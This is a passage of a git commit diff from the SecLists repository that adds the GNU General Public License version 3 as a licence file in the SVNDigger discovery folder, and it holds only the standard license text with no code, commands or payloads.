Merge branch 'master' of github.com:danielmiessler/SecLists
This commit is contained in:
674
Discovery/SVNDigger/Licence.txt
Normal file
674
Discovery/SVNDigger/Licence.txt
Normal file
@@ -0,0 +1,674 @@
|
|||||||
|
GNU GENERAL PUBLIC LICENSE
|
||||||
|
Version 3, 29 June 2007
|
||||||
|
|
||||||
|
Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
|
||||||
|
Everyone is permitted to copy and distribute verbatim copies
|
||||||
|
of this license document, but changing it is not allowed.
|
||||||
|
|
||||||
|
Preamble
|
||||||
|
|
||||||
|
The GNU General Public License is a free, copyleft license for
|
||||||
|
software and other kinds of works.
|
||||||
|
|
||||||
|
The licenses for most software and other practical works are designed
|
||||||
|
to take away your freedom to share and change the works. By contrast,
|
||||||
|
the GNU General Public License is intended to guarantee your freedom to
|
||||||
|
share and change all versions of a program--to make sure it remains free
|
||||||
|
software for all its users. We, the Free Software Foundation, use the
|
||||||
|
GNU General Public License for most of our software; it applies also to
|
||||||
|
any other work released this way by its authors. You can apply it to
|
||||||
|
your programs, too.
|
||||||
|
|
||||||
|
When we speak of free software, we are referring to freedom, not
|
||||||
|
price. Our General Public Licenses are designed to make sure that you
|
||||||
|
have the freedom to distribute copies of free software (and charge for
|
||||||
|
them if you wish), that you receive source code or can get it if you
|
||||||
|
want it, that you can change the software or use pieces of it in new
|
||||||
|
free programs, and that you know you can do these things.
|
||||||
|
|
||||||
|
To protect your rights, we need to prevent others from denying you
|
||||||
|
these rights or asking you to surrender the rights. Therefore, you have
|
||||||
|
certain responsibilities if you distribute copies of the software, or if
|
||||||
|
you modify it: responsibilities to respect the freedom of others.
|
||||||
|
|
||||||
|
For example, if you distribute copies of such a program, whether
|
||||||
|
gratis or for a fee, you must pass on to the recipients the same
|
||||||
|
freedoms that you received. You must make sure that they, too, receive
|
||||||
|
or can get the source code. And you must show them these terms so they
|
||||||
|
know their rights.
|
||||||
|
|
||||||
|
Developers that use the GNU GPL protect your rights with two steps:
|
||||||
|
(1) assert copyright on the software, and (2) offer you this License
|
||||||
|
giving you legal permission to copy, distribute and/or modify it.
|
||||||
|
|
||||||
|
For the developers' and authors' protection, the GPL clearly explains
|
||||||
|
that there is no warranty for this free software. For both users' and
|
||||||
|
authors' sake, the GPL requires that modified versions be marked as
|
||||||
|
changed, so that their problems will not be attributed erroneously to
|
||||||
|
authors of previous versions.
|
||||||
|
|
||||||
|
Some devices are designed to deny users access to install or run
|
||||||
|
modified versions of the software inside them, although the manufacturer
|
||||||
|
can do so. This is fundamentally incompatible with the aim of
|
||||||
|
protecting users' freedom to change the software. The systematic
|
||||||
|
pattern of such abuse occurs in the area of products for individuals to
|
||||||
|
use, which is precisely where it is most unacceptable. Therefore, we
|
||||||
|
have designed this version of the GPL to prohibit the practice for those
|
||||||
|
products. If such problems arise substantially in other domains, we
|
||||||
|
stand ready to extend this provision to those domains in future versions
|
||||||
|
of the GPL, as needed to protect the freedom of users.
|
||||||
|
|
||||||
|
Finally, every program is threatened constantly by software patents.
|
||||||
|
States should not allow patents to restrict development and use of
|
||||||
|
software on general-purpose computers, but in those that do, we wish to
|
||||||
|
avoid the special danger that patents applied to a free program could
|
||||||
|
make it effectively proprietary. To prevent this, the GPL assures that
|
||||||
|
patents cannot be used to render the program non-free.
|
||||||
|
|
||||||
|
The precise terms and conditions for copying, distribution and
|
||||||
|
modification follow.
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
0. Definitions.
|
||||||
|
|
||||||
|
"This License" refers to version 3 of the GNU General Public License.
|
||||||
|
|
||||||
|
"Copyright" also means copyright-like laws that apply to other kinds of
|
||||||
|
works, such as semiconductor masks.
|
||||||
|
|
||||||
|
"The Program" refers to any copyrightable work licensed under this
|
||||||
|
License. Each licensee is addressed as "you". "Licensees" and
|
||||||
|
"recipients" may be individuals or organizations.
|
||||||
|
|
||||||
|
To "modify" a work means to copy from or adapt all or part of the work
|
||||||
|
in a fashion requiring copyright permission, other than the making of an
|
||||||
|
exact copy. The resulting work is called a "modified version" of the
|
||||||
|
earlier work or a work "based on" the earlier work.
|
||||||
|
|
||||||
|
A "covered work" means either the unmodified Program or a work based
|
||||||
|
on the Program.
|
||||||
|
|
||||||
|
To "propagate" a work means to do anything with it that, without
|
||||||
|
permission, would make you directly or secondarily liable for
|
||||||
|
infringement under applicable copyright law, except executing it on a
|
||||||
|
computer or modifying a private copy. Propagation includes copying,
|
||||||
|
distribution (with or without modification), making available to the
|
||||||
|
public, and in some countries other activities as well.
|
||||||
|
|
||||||
|
To "convey" a work means any kind of propagation that enables other
|
||||||
|
parties to make or receive copies. Mere interaction with a user through
|
||||||
|
a computer network, with no transfer of a copy, is not conveying.
|
||||||
|
|
||||||
|
An interactive user interface displays "Appropriate Legal Notices"
|
||||||
|
to the extent that it includes a convenient and prominently visible
|
||||||
|
feature that (1) displays an appropriate copyright notice, and (2)
|
||||||
|
tells the user that there is no warranty for the work (except to the
|
||||||
|
extent that warranties are provided), that licensees may convey the
|
||||||
|
work under this License, and how to view a copy of this License. If
|
||||||
|
the interface presents a list of user commands or options, such as a
|
||||||
|
menu, a prominent item in the list meets this criterion.
|
||||||
|
|
||||||
|
1. Source Code.
|
||||||
|
|
||||||
|
The "source code" for a work means the preferred form of the work
|
||||||
|
for making modifications to it. "Object code" means any non-source
|
||||||
|
form of a work.
|
||||||
|
|
||||||
|
A "Standard Interface" means an interface that either is an official
|
||||||
|
standard defined by a recognized standards body, or, in the case of
|
||||||
|
interfaces specified for a particular programming language, one that
|
||||||
|
is widely used among developers working in that language.
|
||||||
|
|
||||||
|
The "System Libraries" of an executable work include anything, other
|
||||||
|
than the work as a whole, that (a) is included in the normal form of
|
||||||
|
packaging a Major Component, but which is not part of that Major
|
||||||
|
Component, and (b) serves only to enable use of the work with that
|
||||||
|
Major Component, or to implement a Standard Interface for which an
|
||||||
|
implementation is available to the public in source code form. A
|
||||||
|
"Major Component", in this context, means a major essential component
|
||||||
|
(kernel, window system, and so on) of the specific operating system
|
||||||
|
(if any) on which the executable work runs, or a compiler used to
|
||||||
|
produce the work, or an object code interpreter used to run it.
|
||||||
|
|
||||||
|
The "Corresponding Source" for a work in object code form means all
|
||||||
|
the source code needed to generate, install, and (for an executable
|
||||||
|
work) run the object code and to modify the work, including scripts to
|
||||||
|
control those activities. However, it does not include the work's
|
||||||
|
System Libraries, or general-purpose tools or generally available free
|
||||||
|
programs which are used unmodified in performing those activities but
|
||||||
|
which are not part of the work. For example, Corresponding Source
|
||||||
|
includes interface definition files associated with source files for
|
||||||
|
the work, and the source code for shared libraries and dynamically
|
||||||
|
linked subprograms that the work is specifically designed to require,
|
||||||
|
such as by intimate data communication or control flow between those
|
||||||
|
subprograms and other parts of the work.
|
||||||
|
|
||||||
|
The Corresponding Source need not include anything that users
|
||||||
|
can regenerate automatically from other parts of the Corresponding
|
||||||
|
Source.
|
||||||
|
|
||||||
|
The Corresponding Source for a work in source code form is that
|
||||||
|
same work.
|
||||||
|
|
||||||
|
2. Basic Permissions.
|
||||||
|
|
||||||
|
All rights granted under this License are granted for the term of
|
||||||
|
copyright on the Program, and are irrevocable provided the stated
|
||||||
|
conditions are met. This License explicitly affirms your unlimited
|
||||||
|
permission to run the unmodified Program. The output from running a
|
||||||
|
covered work is covered by this License only if the output, given its
|
||||||
|
content, constitutes a covered work. This License acknowledges your
|
||||||
|
rights of fair use or other equivalent, as provided by copyright law.
|
||||||
|
|
||||||
|
You may make, run and propagate covered works that you do not
|
||||||
|
convey, without conditions so long as your license otherwise remains
|
||||||
|
in force. You may convey covered works to others for the sole purpose
|
||||||
|
of having them make modifications exclusively for you, or provide you
|
||||||
|
with facilities for running those works, provided that you comply with
|
||||||
|
the terms of this License in conveying all material for which you do
|
||||||
|
not control copyright. Those thus making or running the covered works
|
||||||
|
for you must do so exclusively on your behalf, under your direction
|
||||||
|
and control, on terms that prohibit them from making any copies of
|
||||||
|
your copyrighted material outside their relationship with you.
|
||||||
|
|
||||||
|
Conveying under any other circumstances is permitted solely under
|
||||||
|
the conditions stated below. Sublicensing is not allowed; section 10
|
||||||
|
makes it unnecessary.
|
||||||
|
|
||||||
|
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
|
||||||
|
|
||||||
|
No covered work shall be deemed part of an effective technological
|
||||||
|
measure under any applicable law fulfilling obligations under article
|
||||||
|
11 of the WIPO copyright treaty adopted on 20 December 1996, or
|
||||||
|
similar laws prohibiting or restricting circumvention of such
|
||||||
|
measures.
|
||||||
|
|
||||||
|
When you convey a covered work, you waive any legal power to forbid
|
||||||
|
circumvention of technological measures to the extent such circumvention
|
||||||
|
is effected by exercising rights under this License with respect to
|
||||||
|
the covered work, and you disclaim any intention to limit operation or
|
||||||
|
modification of the work as a means of enforcing, against the work's
|
||||||
|
users, your or third parties' legal rights to forbid circumvention of
|
||||||
|
technological measures.
|
||||||
|
|
||||||
|
4. Conveying Verbatim Copies.
|
||||||
|
|
||||||
|
You may convey verbatim copies of the Program's source code as you
|
||||||
|
receive it, in any medium, provided that you conspicuously and
|
||||||
|
appropriately publish on each copy an appropriate copyright notice;
|
||||||
|
keep intact all notices stating that this License and any
|
||||||
|
non-permissive terms added in accord with section 7 apply to the code;
|
||||||
|
keep intact all notices of the absence of any warranty; and give all
|
||||||
|
recipients a copy of this License along with the Program.
|
||||||
|
|
||||||
|
You may charge any price or no price for each copy that you convey,
|
||||||
|
and you may offer support or warranty protection for a fee.
|
||||||
|
|
||||||
|
5. Conveying Modified Source Versions.
|
||||||
|
|
||||||
|
You may convey a work based on the Program, or the modifications to
|
||||||
|
produce it from the Program, in the form of source code under the
|
||||||
|
terms of section 4, provided that you also meet all of these conditions:
|
||||||
|
|
||||||
|
a) The work must carry prominent notices stating that you modified
|
||||||
|
it, and giving a relevant date.
|
||||||
|
|
||||||
|
b) The work must carry prominent notices stating that it is
|
||||||
|
released under this License and any conditions added under section
|
||||||
|
7. This requirement modifies the requirement in section 4 to
|
||||||
|
"keep intact all notices".
|
||||||
|
|
||||||
|
c) You must license the entire work, as a whole, under this
|
||||||
|
License to anyone who comes into possession of a copy. This
|
||||||
|
License will therefore apply, along with any applicable section 7
|
||||||
|
additional terms, to the whole of the work, and all its parts,
|
||||||
|
regardless of how they are packaged. This License gives no
|
||||||
|
permission to license the work in any other way, but it does not
|
||||||
|
invalidate such permission if you have separately received it.
|
||||||
|
|
||||||
|
d) If the work has interactive user interfaces, each must display
|
||||||
|
Appropriate Legal Notices; however, if the Program has interactive
|
||||||
|
interfaces that do not display Appropriate Legal Notices, your
|
||||||
|
work need not make them do so.
|
||||||
|
|
||||||
|
A compilation of a covered work with other separate and independent
|
||||||
|
works, which are not by their nature extensions of the covered work,
|
||||||
|
and which are not combined with it such as to form a larger program,
|
||||||
|
in or on a volume of a storage or distribution medium, is called an
|
||||||
|
"aggregate" if the compilation and its resulting copyright are not
|
||||||
|
used to limit the access or legal rights of the compilation's users
|
||||||
|
beyond what the individual works permit. Inclusion of a covered work
|
||||||
|
in an aggregate does not cause this License to apply to the other
|
||||||
|
parts of the aggregate.
|
||||||
|
|
||||||
|
6. Conveying Non-Source Forms.
|
||||||
|
|
||||||
|
You may convey a covered work in object code form under the terms
|
||||||
|
of sections 4 and 5, provided that you also convey the
|
||||||
|
machine-readable Corresponding Source under the terms of this License,
|
||||||
|
in one of these ways:
|
||||||
|
|
||||||
|
a) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by the
|
||||||
|
Corresponding Source fixed on a durable physical medium
|
||||||
|
customarily used for software interchange.
|
||||||
|
|
||||||
|
b) Convey the object code in, or embodied in, a physical product
|
||||||
|
(including a physical distribution medium), accompanied by a
|
||||||
|
written offer, valid for at least three years and valid for as
|
||||||
|
long as you offer spare parts or customer support for that product
|
||||||
|
model, to give anyone who possesses the object code either (1) a
|
||||||
|
copy of the Corresponding Source for all the software in the
|
||||||
|
product that is covered by this License, on a durable physical
|
||||||
|
medium customarily used for software interchange, for a price no
|
||||||
|
more than your reasonable cost of physically performing this
|
||||||
|
conveying of source, or (2) access to copy the
|
||||||
|
Corresponding Source from a network server at no charge.
|
||||||
|
|
||||||
|
c) Convey individual copies of the object code with a copy of the
|
||||||
|
written offer to provide the Corresponding Source. This
|
||||||
|
alternative is allowed only occasionally and noncommercially, and
|
||||||
|
only if you received the object code with such an offer, in accord
|
||||||
|
with subsection 6b.
|
||||||
|
|
||||||
|
d) Convey the object code by offering access from a designated
|
||||||
|
place (gratis or for a charge), and offer equivalent access to the
|
||||||
|
Corresponding Source in the same way through the same place at no
|
||||||
|
further charge. You need not require recipients to copy the
|
||||||
|
Corresponding Source along with the object code. If the place to
|
||||||
|
copy the object code is a network server, the Corresponding Source
|
||||||
|
may be on a different server (operated by you or a third party)
|
||||||
|
that supports equivalent copying facilities, provided you maintain
|
||||||
|
clear directions next to the object code saying where to find the
|
||||||
|
Corresponding Source. Regardless of what server hosts the
|
||||||
|
Corresponding Source, you remain obligated to ensure that it is
|
||||||
|
available for as long as needed to satisfy these requirements.
|
||||||
|
|
||||||
|
e) Convey the object code using peer-to-peer transmission, provided
|
||||||
|
you inform other peers where the object code and Corresponding
|
||||||
|
Source of the work are being offered to the general public at no
|
||||||
|
charge under subsection 6d.
|
||||||
|
|
||||||
|
A separable portion of the object code, whose source code is excluded
|
||||||
|
from the Corresponding Source as a System Library, need not be
|
||||||
|
included in conveying the object code work.
|
||||||
|
|
||||||
|
A "User Product" is either (1) a "consumer product", which means any
|
||||||
|
tangible personal property which is normally used for personal, family,
|
||||||
|
or household purposes, or (2) anything designed or sold for incorporation
|
||||||
|
into a dwelling. In determining whether a product is a consumer product,
|
||||||
|
doubtful cases shall be resolved in favor of coverage. For a particular
|
||||||
|
product received by a particular user, "normally used" refers to a
|
||||||
|
typical or common use of that class of product, regardless of the status
|
||||||
|
of the particular user or of the way in which the particular user
|
||||||
|
actually uses, or expects or is expected to use, the product. A product
|
||||||
|
is a consumer product regardless of whether the product has substantial
|
||||||
|
commercial, industrial or non-consumer uses, unless such uses represent
|
||||||
|
the only significant mode of use of the product.
|
||||||
|
|
||||||
|
"Installation Information" for a User Product means any methods,
|
||||||
|
procedures, authorization keys, or other information required to install
|
||||||
|
and execute modified versions of a covered work in that User Product from
|
||||||
|
a modified version of its Corresponding Source. The information must
|
||||||
|
suffice to ensure that the continued functioning of the modified object
|
||||||
|
code is in no case prevented or interfered with solely because
|
||||||
|
modification has been made.
|
||||||
|
|
||||||
|
If you convey an object code work under this section in, or with, or
|
||||||
|
specifically for use in, a User Product, and the conveying occurs as
|
||||||
|
part of a transaction in which the right of possession and use of the
|
||||||
|
User Product is transferred to the recipient in perpetuity or for a
|
||||||
|
fixed term (regardless of how the transaction is characterized), the
|
||||||
|
Corresponding Source conveyed under this section must be accompanied
|
||||||
|
by the Installation Information. But this requirement does not apply
|
||||||
|
if neither you nor any third party retains the ability to install
|
||||||
|
modified object code on the User Product (for example, the work has
|
||||||
|
been installed in ROM).
|
||||||
|
|
||||||
|
The requirement to provide Installation Information does not include a
|
||||||
|
requirement to continue to provide support service, warranty, or updates
|
||||||
|
for a work that has been modified or installed by the recipient, or for
|
||||||
|
the User Product in which it has been modified or installed. Access to a
|
||||||
|
network may be denied when the modification itself materially and
|
||||||
|
adversely affects the operation of the network or violates the rules and
|
||||||
|
protocols for communication across the network.
|
||||||
|
|
||||||
|
Corresponding Source conveyed, and Installation Information provided,
|
||||||
|
in accord with this section must be in a format that is publicly
|
||||||
|
documented (and with an implementation available to the public in
|
||||||
|
source code form), and must require no special password or key for
|
||||||
|
unpacking, reading or copying.
|
||||||
|
|
||||||
|
7. Additional Terms.
|
||||||
|
|
||||||
|
"Additional permissions" are terms that supplement the terms of this
|
||||||
|
License by making exceptions from one or more of its conditions.
|
||||||
|
Additional permissions that are applicable to the entire Program shall
|
||||||
|
be treated as though they were included in this License, to the extent
|
||||||
|
that they are valid under applicable law. If additional permissions
|
||||||
|
apply only to part of the Program, that part may be used separately
|
||||||
|
under those permissions, but the entire Program remains governed by
|
||||||
|
this License without regard to the additional permissions.
|
||||||
|
|
||||||
|
When you convey a copy of a covered work, you may at your option
|
||||||
|
remove any additional permissions from that copy, or from any part of
|
||||||
|
it. (Additional permissions may be written to require their own
|
||||||
|
removal in certain cases when you modify the work.) You may place
|
||||||
|
additional permissions on material, added by you to a covered work,
|
||||||
|
for which you have or can give appropriate copyright permission.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, for material you
|
||||||
|
add to a covered work, you may (if authorized by the copyright holders of
|
||||||
|
that material) supplement the terms of this License with terms:
|
||||||
|
|
||||||
|
a) Disclaiming warranty or limiting liability differently from the
|
||||||
|
terms of sections 15 and 16 of this License; or
|
||||||
|
|
||||||
|
b) Requiring preservation of specified reasonable legal notices or
|
||||||
|
author attributions in that material or in the Appropriate Legal
|
||||||
|
Notices displayed by works containing it; or
|
||||||
|
|
||||||
|
c) Prohibiting misrepresentation of the origin of that material, or
|
||||||
|
requiring that modified versions of such material be marked in
|
||||||
|
reasonable ways as different from the original version; or
|
||||||
|
|
||||||
|
d) Limiting the use for publicity purposes of names of licensors or
|
||||||
|
authors of the material; or
|
||||||
|
|
||||||
|
e) Declining to grant rights under trademark law for use of some
|
||||||
|
trade names, trademarks, or service marks; or
|
||||||
|
|
||||||
|
f) Requiring indemnification of licensors and authors of that
|
||||||
|
material by anyone who conveys the material (or modified versions of
|
||||||
|
it) with contractual assumptions of liability to the recipient, for
|
||||||
|
any liability that these contractual assumptions directly impose on
|
||||||
|
those licensors and authors.
|
||||||
|
|
||||||
|
All other non-permissive additional terms are considered "further
|
||||||
|
restrictions" within the meaning of section 10. If the Program as you
|
||||||
|
received it, or any part of it, contains a notice stating that it is
|
||||||
|
governed by this License along with a term that is a further
|
||||||
|
restriction, you may remove that term. If a license document contains
|
||||||
|
a further restriction but permits relicensing or conveying under this
|
||||||
|
License, you may add to a covered work material governed by the terms
|
||||||
|
of that license document, provided that the further restriction does
|
||||||
|
not survive such relicensing or conveying.
|
||||||
|
|
||||||
|
If you add terms to a covered work in accord with this section, you
|
||||||
|
must place, in the relevant source files, a statement of the
|
||||||
|
additional terms that apply to those files, or a notice indicating
|
||||||
|
where to find the applicable terms.
|
||||||
|
|
||||||
|
Additional terms, permissive or non-permissive, may be stated in the
|
||||||
|
form of a separately written license, or stated as exceptions;
|
||||||
|
the above requirements apply either way.
|
||||||
|
|
||||||
|
8. Termination.
|
||||||
|
|
||||||
|
You may not propagate or modify a covered work except as expressly
|
||||||
|
provided under this License. Any attempt otherwise to propagate or
|
||||||
|
modify it is void, and will automatically terminate your rights under
|
||||||
|
this License (including any patent licenses granted under the third
|
||||||
|
paragraph of section 11).
|
||||||
|
|
||||||
|
However, if you cease all violation of this License, then your
|
||||||
|
license from a particular copyright holder is reinstated (a)
|
||||||
|
provisionally, unless and until the copyright holder explicitly and
|
||||||
|
finally terminates your license, and (b) permanently, if the copyright
|
||||||
|
holder fails to notify you of the violation by some reasonable means
|
||||||
|
prior to 60 days after the cessation.
|
||||||
|
|
||||||
|
Moreover, your license from a particular copyright holder is
|
||||||
|
reinstated permanently if the copyright holder notifies you of the
|
||||||
|
violation by some reasonable means, this is the first time you have
|
||||||
|
received notice of violation of this License (for any work) from that
|
||||||
|
copyright holder, and you cure the violation prior to 30 days after
|
||||||
|
your receipt of the notice.
|
||||||
|
|
||||||
|
Termination of your rights under this section does not terminate the
|
||||||
|
licenses of parties who have received copies or rights from you under
|
||||||
|
this License. If your rights have been terminated and not permanently
|
||||||
|
reinstated, you do not qualify to receive new licenses for the same
|
||||||
|
material under section 10.
|
||||||
|
|
||||||
|
9. Acceptance Not Required for Having Copies.
|
||||||
|
|
||||||
|
You are not required to accept this License in order to receive or
|
||||||
|
run a copy of the Program. Ancillary propagation of a covered work
|
||||||
|
occurring solely as a consequence of using peer-to-peer transmission
|
||||||
|
to receive a copy likewise does not require acceptance. However,
|
||||||
|
nothing other than this License grants you permission to propagate or
|
||||||
|
modify any covered work. These actions infringe copyright if you do
|
||||||
|
not accept this License. Therefore, by modifying or propagating a
|
||||||
|
covered work, you indicate your acceptance of this License to do so.
|
||||||
|
|
||||||
|
10. Automatic Licensing of Downstream Recipients.
|
||||||
|
|
||||||
|
Each time you convey a covered work, the recipient automatically
|
||||||
|
receives a license from the original licensors, to run, modify and
|
||||||
|
propagate that work, subject to this License. You are not responsible
|
||||||
|
for enforcing compliance by third parties with this License.
|
||||||
|
|
||||||
|
An "entity transaction" is a transaction transferring control of an
|
||||||
|
organization, or substantially all assets of one, or subdividing an
|
||||||
|
organization, or merging organizations. If propagation of a covered
|
||||||
|
work results from an entity transaction, each party to that
|
||||||
|
transaction who receives a copy of the work also receives whatever
|
||||||
|
licenses to the work the party's predecessor in interest had or could
|
||||||
|
give under the previous paragraph, plus a right to possession of the
|
||||||
|
Corresponding Source of the work from the predecessor in interest, if
|
||||||
|
the predecessor has it or can get it with reasonable efforts.
|
||||||
|
|
||||||
|
You may not impose any further restrictions on the exercise of the
|
||||||
|
rights granted or affirmed under this License. For example, you may
|
||||||
|
not impose a license fee, royalty, or other charge for exercise of
|
||||||
|
rights granted under this License, and you may not initiate litigation
|
||||||
|
(including a cross-claim or counterclaim in a lawsuit) alleging that
|
||||||
|
any patent claim is infringed by making, using, selling, offering for
|
||||||
|
sale, or importing the Program or any portion of it.
|
||||||
|
|
||||||
|
11. Patents.
|
||||||
|
|
||||||
|
A "contributor" is a copyright holder who authorizes use under this
|
||||||
|
License of the Program or a work on which the Program is based. The
|
||||||
|
work thus licensed is called the contributor's "contributor version".
|
||||||
|
|
||||||
|
A contributor's "essential patent claims" are all patent claims
|
||||||
|
owned or controlled by the contributor, whether already acquired or
|
||||||
|
hereafter acquired, that would be infringed by some manner, permitted
|
||||||
|
by this License, of making, using, or selling its contributor version,
|
||||||
|
but do not include claims that would be infringed only as a
|
||||||
|
consequence of further modification of the contributor version. For
|
||||||
|
purposes of this definition, "control" includes the right to grant
|
||||||
|
patent sublicenses in a manner consistent with the requirements of
|
||||||
|
this License.
|
||||||
|
|
||||||
|
Each contributor grants you a non-exclusive, worldwide, royalty-free
|
||||||
|
patent license under the contributor's essential patent claims, to
|
||||||
|
make, use, sell, offer for sale, import and otherwise run, modify and
|
||||||
|
propagate the contents of its contributor version.
|
||||||
|
|
||||||
|
In the following three paragraphs, a "patent license" is any express
|
||||||
|
agreement or commitment, however denominated, not to enforce a patent
|
||||||
|
(such as an express permission to practice a patent or covenant not to
|
||||||
|
sue for patent infringement). To "grant" such a patent license to a
|
||||||
|
party means to make such an agreement or commitment not to enforce a
|
||||||
|
patent against the party.
|
||||||
|
|
||||||
|
If you convey a covered work, knowingly relying on a patent license,
|
||||||
|
and the Corresponding Source of the work is not available for anyone
|
||||||
|
to copy, free of charge and under the terms of this License, through a
|
||||||
|
publicly available network server or other readily accessible means,
|
||||||
|
then you must either (1) cause the Corresponding Source to be so
|
||||||
|
available, or (2) arrange to deprive yourself of the benefit of the
|
||||||
|
patent license for this particular work, or (3) arrange, in a manner
|
||||||
|
consistent with the requirements of this License, to extend the patent
|
||||||
|
license to downstream recipients. "Knowingly relying" means you have
|
||||||
|
actual knowledge that, but for the patent license, your conveying the
|
||||||
|
covered work in a country, or your recipient's use of the covered work
|
||||||
|
in a country, would infringe one or more identifiable patents in that
|
||||||
|
country that you have reason to believe are valid.
|
||||||
|
|
||||||
|
If, pursuant to or in connection with a single transaction or
|
||||||
|
arrangement, you convey, or propagate by procuring conveyance of, a
|
||||||
|
covered work, and grant a patent license to some of the parties
|
||||||
|
receiving the covered work authorizing them to use, propagate, modify
|
||||||
|
or convey a specific copy of the covered work, then the patent license
|
||||||
|
you grant is automatically extended to all recipients of the covered
|
||||||
|
work and works based on it.
|
||||||
|
|
||||||
|
A patent license is "discriminatory" if it does not include within
|
||||||
|
the scope of its coverage, prohibits the exercise of, or is
|
||||||
|
conditioned on the non-exercise of one or more of the rights that are
|
||||||
|
specifically granted under this License. You may not convey a covered
|
||||||
|
work if you are a party to an arrangement with a third party that is
|
||||||
|
in the business of distributing software, under which you make payment
|
||||||
|
to the third party based on the extent of your activity of conveying
|
||||||
|
the work, and under which the third party grants, to any of the
|
||||||
|
parties who would receive the covered work from you, a discriminatory
|
||||||
|
patent license (a) in connection with copies of the covered work
|
||||||
|
conveyed by you (or copies made from those copies), or (b) primarily
|
||||||
|
for and in connection with specific products or compilations that
|
||||||
|
contain the covered work, unless you entered into that arrangement,
|
||||||
|
or that patent license was granted, prior to 28 March 2007.
|
||||||
|
|
||||||
|
Nothing in this License shall be construed as excluding or limiting
|
||||||
|
any implied license or other defenses to infringement that may
|
||||||
|
otherwise be available to you under applicable patent law.
|
||||||
|
|
||||||
|
12. No Surrender of Others' Freedom.
|
||||||
|
|
||||||
|
If conditions are imposed on you (whether by court order, agreement or
|
||||||
|
otherwise) that contradict the conditions of this License, they do not
|
||||||
|
excuse you from the conditions of this License. If you cannot convey a
|
||||||
|
covered work so as to satisfy simultaneously your obligations under this
|
||||||
|
License and any other pertinent obligations, then as a consequence you may
|
||||||
|
not convey it at all. For example, if you agree to terms that obligate you
|
||||||
|
to collect a royalty for further conveying from those to whom you convey
|
||||||
|
the Program, the only way you could satisfy both those terms and this
|
||||||
|
License would be to refrain entirely from conveying the Program.
|
||||||
|
|
||||||
|
13. Use with the GNU Affero General Public License.
|
||||||
|
|
||||||
|
Notwithstanding any other provision of this License, you have
|
||||||
|
permission to link or combine any covered work with a work licensed
|
||||||
|
under version 3 of the GNU Affero General Public License into a single
|
||||||
|
combined work, and to convey the resulting work. The terms of this
|
||||||
|
License will continue to apply to the part which is the covered work,
|
||||||
|
but the special requirements of the GNU Affero General Public License,
|
||||||
|
section 13, concerning interaction through a network will apply to the
|
||||||
|
combination as such.
|
||||||
|
|
||||||
|
14. Revised Versions of this License.
|
||||||
|
|
||||||
|
The Free Software Foundation may publish revised and/or new versions of
|
||||||
|
the GNU General Public License from time to time. Such new versions will
|
||||||
|
be similar in spirit to the present version, but may differ in detail to
|
||||||
|
address new problems or concerns.
|
||||||
|
|
||||||
|
Each version is given a distinguishing version number. If the
|
||||||
|
Program specifies that a certain numbered version of the GNU General
|
||||||
|
Public License "or any later version" applies to it, you have the
|
||||||
|
option of following the terms and conditions either of that numbered
|
||||||
|
version or of any later version published by the Free Software
|
||||||
|
Foundation. If the Program does not specify a version number of the
|
||||||
|
GNU General Public License, you may choose any version ever published
|
||||||
|
by the Free Software Foundation.
|
||||||
|
|
||||||
|
If the Program specifies that a proxy can decide which future
|
||||||
|
versions of the GNU General Public License can be used, that proxy's
|
||||||
|
public statement of acceptance of a version permanently authorizes you
|
||||||
|
to choose that version for the Program.
|
||||||
|
|
||||||
|
Later license versions may give you additional or different
|
||||||
|
permissions. However, no additional obligations are imposed on any
|
||||||
|
author or copyright holder as a result of your choosing to follow a
|
||||||
|
later version.
|
||||||
|
|
||||||
|
15. Disclaimer of Warranty.
|
||||||
|
|
||||||
|
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
|
||||||
|
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
|
||||||
|
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
|
||||||
|
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
|
||||||
|
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
|
||||||
|
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
|
||||||
|
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
|
||||||
|
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
|
||||||
|
|
||||||
|
16. Limitation of Liability.
|
||||||
|
|
||||||
|
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
|
||||||
|
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
|
||||||
|
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
|
||||||
|
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
|
||||||
|
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
|
||||||
|
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
|
||||||
|
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
|
||||||
|
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
|
||||||
|
SUCH DAMAGES.
|
||||||
|
|
||||||
|
17. Interpretation of Sections 15 and 16.
|
||||||
|
|
||||||
|
If the disclaimer of warranty and limitation of liability provided
|
||||||
|
above cannot be given local legal effect according to their terms,
|
||||||
|
reviewing courts shall apply local law that most closely approximates
|
||||||
|
an absolute waiver of all civil liability in connection with the
|
||||||
|
Program, unless a warranty or assumption of liability accompanies a
|
||||||
|
copy of the Program in return for a fee.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
How to Apply These Terms to Your New Programs
|
||||||
|
|
||||||
|
If you develop a new program, and you want it to be of the greatest
|
||||||
|
possible use to the public, the best way to achieve this is to make it
|
||||||
|
free software which everyone can redistribute and change under these terms.
|
||||||
|
|
||||||
|
